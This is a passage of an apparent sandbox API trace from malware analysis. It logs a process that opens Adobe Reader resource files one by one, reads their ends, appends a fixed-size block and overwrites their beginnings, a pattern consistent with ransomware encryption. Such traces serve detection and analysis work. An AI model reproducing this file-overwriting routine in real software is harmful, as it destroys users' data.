ReleaseMutex (hMutex=0x168) returned 1 [0114.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dut57.ths", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dut57.ths", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dut57.ths", lpUsedDefaultChar=0x0) returned 9 [0114.456] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0114.475] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.486] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xc2c00 [0114.486] ReadFile (in: hFile=0x204, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.500] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xc2c00 [0114.501] WriteFile (in: hFile=0x204, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.502] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0114.502] WriteFile (in: hFile=0x204, lpBuffer=0x289f978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0114.502] WriteFile (in: hFile=0x204, lpBuffer=0x289f978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.502] CloseHandle (hObject=0x204) returned 1 [0114.503] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0114.503] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0114.504] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6800 [0114.504] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0114.504] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.504] ReleaseMutex (hMutex=0x168) returned 1 [0114.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fin.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fin.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac6c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fin.hyp", lpUsedDefaultChar=0x0) returned 7 [0114.504] ReadFile (in: hFile=0x204, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.520] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5800 [0114.520] ReadFile (in: hFile=0x204, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.542] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5800 [0114.542] WriteFile (in: hFile=0x204, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.543] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0114.543] WriteFile (in: hFile=0x204, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.543] CloseHandle (hObject=0x204) returned 1 [0114.543] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn93.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn93.ths"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0114.544] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0114.544] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4c800 [0114.544] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0114.544] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.544] ReleaseMutex (hMutex=0x168) returned 1 [0114.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="frn93.ths", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="frn93.ths", cchWideChar=9, lpMultiByteStr=0x1f735cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="frn93.ths", lpUsedDefaultChar=0x0) returned 9 [0114.545] ReadFile (in: hFile=0x204, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0114.800] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x4b800 [0114.800] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.808] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x4b800 [0114.808] WriteFile (in: hFile=0x204, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.809] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0114.809] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0114.809] CloseHandle (hObject=0x204) returned 1 [0114.810] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0114.811] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0114.811] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x8000 [0114.811] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0114.811] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.811] ReleaseMutex (hMutex=0x168) returned 1 [0114.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="grm32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="grm32.clx", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="grm32.clx", lpUsedDefaultChar=0x0) returned 9 [0114.812] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.824] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x7000 [0114.824] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.847] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x7000 [0114.847] WriteFile (in: hFile=0x204, lpBuffer=0x2884de8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2884de8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.848] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0114.848] WriteFile (in: hFile=0x204, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.848] CloseHandle (hObject=0x204) returned 1 [0114.848] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0114.850] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0114.850] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x7ffe [0114.850] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0114.850] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.850] ReleaseMutex (hMutex=0x168) returned 1 [0114.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hrv32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hrv32.clx", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hrv32.clx", lpUsedDefaultChar=0x0) returned 9 [0114.850] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.857] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x6ffe [0114.857] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.862] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x6ffe [0114.862] WriteFile (in: hFile=0x204, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.863] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0114.863] WriteFile (in: hFile=0x204, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.864] CloseHandle (hObject=0x204) returned 1 [0114.864] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl26.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl26.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0114.867] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0114.868] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2efe4 [0114.868] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0114.868] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.868] ReleaseMutex (hMutex=0x168) returned 1 [0114.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="itl26.hsp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="itl26.hsp", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="itl26.hsp", lpUsedDefaultChar=0x0) returned 9 [0114.868] ReadFile (in: hFile=0x204, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0114.874] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2dfe4 [0114.874] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.956] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2dfe4 [0114.956] WriteFile (in: hFile=0x204, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.958] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0114.958] WriteFile (in: hFile=0x204, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0114.958] CloseHandle (hObject=0x204) returned 1 [0114.958] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit136.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit136.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0114.959] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0114.960] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x73800 [0114.960] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0114.960] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.960] ReleaseMutex (hMutex=0x168) returned 1 [0114.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lit136.lex", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lit136.lex", cchWideChar=10, lpMultiByteStr=0x1f735ec, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lit136.lex", lpUsedDefaultChar=0x0) returned 10 [0114.960] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0114.986] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x72800 [0114.986] ReadFile (in: hFile=0x204, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.016] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x72800 [0115.016] WriteFile (in: hFile=0x204, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.017] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0115.017] WriteFile (in: hFile=0x204, lpBuffer=0x28bd6d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28bd6d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0115.017] CloseHandle (hObject=0x204) returned 1 [0115.018] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0115.019] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0115.019] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x48c [0115.019] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0115.019] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.019] ReleaseMutex (hMutex=0x168) returned 1 [0115.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nyn.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0115.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nyn.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nyn.fca", lpUsedDefaultChar=0x0) returned 7 [0115.019] ReadFile (in: hFile=0x204, lpBuffer=0x28bd6f8, nNumberOfBytesToRead=0x48c, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x28bd6f8*, lpNumberOfBytesRead=0x2e9f2bc*=0x48c, lpOverlapped=0x0) returned 1 [0115.043] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0115.043] WriteFile (in: hFile=0x204, lpBuffer=0x1eace08*, nNumberOfBytesToWrite=0xa14, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesWritten=0x2e9f2d0*=0xa14, lpOverlapped=0x0) returned 1 [0115.043] CloseHandle (hObject=0x204) returned 1 [0115.043] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 